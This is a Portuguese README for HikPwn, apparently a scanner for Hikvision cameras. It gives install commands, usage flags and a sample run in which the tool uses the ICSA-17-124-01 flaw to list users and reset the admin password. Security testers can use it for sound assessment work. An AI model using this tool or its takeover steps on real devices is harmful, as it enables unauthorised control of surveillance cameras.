
HikPwn, um scanner simples para dispositivos Hikvision com capacidades básicas de varredura de vulnerabilidades escrito em Python 3.8.
HikPwn, um scanner simples para dispositivos Hikvision com capacidades básicas de varredura de vulnerabilidades escrito em Python 3.8. Este projeto nasceu da curiosidade enquanto eu capturava e observava o tráfego de rede gerado por alguns softwares e dispositivos da Hikvision.
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
Trabalho em andamento... fique ligado!
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active] [--ICSA_17_124_01]
HikPwn, um scanner simples para dispositivos Hikvision com capacidades básicas de varredura de vulnerabilidades escrito em Python 3.8. por Ananke: https://github.com/4n4nk3.
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
--interface INTERFACE a interface de rede a ser usada
--address ADDRESS o endereço IP da interface de rede selecionada
--active ativar a descoberta "ativa"
--ICSA_17_124_01 ativar a detecção ICSA-17-124-01 nos dispositivos descobertos
Usando eth0 como interface de rede e XXX.XXX.XXX.XXX como seu endereço IP...
[*] Iniciado 30 segundos de descoberta passiva e ativa...
================================================================================
[*] Total de dispositivos detectados: 1
XXX.XXX.XXX.XX
================================================================================
[*] Resultados da descoberta ativa:
DISPOSITIVO #1:
RÓTULO DADO
--------------------------------------------------
Número Serial xxxxxxxxxxxxxxxxxxxxx
Descrição DS-2DE4220IW-D
MAC XX:XX:XX:XX:XX:XX
IP XXX.XXX.XXX.XX
DHCP em uso falso
Versão do Software V5.4.3build 160810
Versão DSP V7.3 build 160801
Tempo de Inicialização 2019-03-01 00:05:33
Status de Ativação verdadeiro
Capacidade de Redefinir Senha verdadeiro
================================================================================
[*] Resultados da descoberta passiva:
DISPOSITIVO #1:
Detectado um dispositivo com endereço IP XXX.XXX.XXX.XX e endereço MAC XX:XX:XX:XX:XX:XX.
================================================================================
[*] Iniciando varredura para ICSA-17-124-01...
Verificando se XXX.XXX.XXX.XX é vulnerável ao ICSA-17-124-01 e se podemos obter uma lista de usuários válidos presentes no dispositivo...
XXX.XXX.XXX.XX é vulnerável ao ICSA_17_124_01. Lista de usuários recuperada:
user_id 1
user_name admin
priority high
user_level Administrator
Você deseja explorar a vulnerabilidade e tentar alterar a senha do admin? (s/n)
>>> s
Digite uma senha composta por números e letras (8-12 caracteres):
>>>
Alteração de senha bem-sucedida.
Este projeto é apenas para fins educacionais. Não o utilize para atividades ilegais. Não apoio nem tolero ações ilegais ou antiéticas e não posso ser responsabilizado pelo possível uso indevido deste software.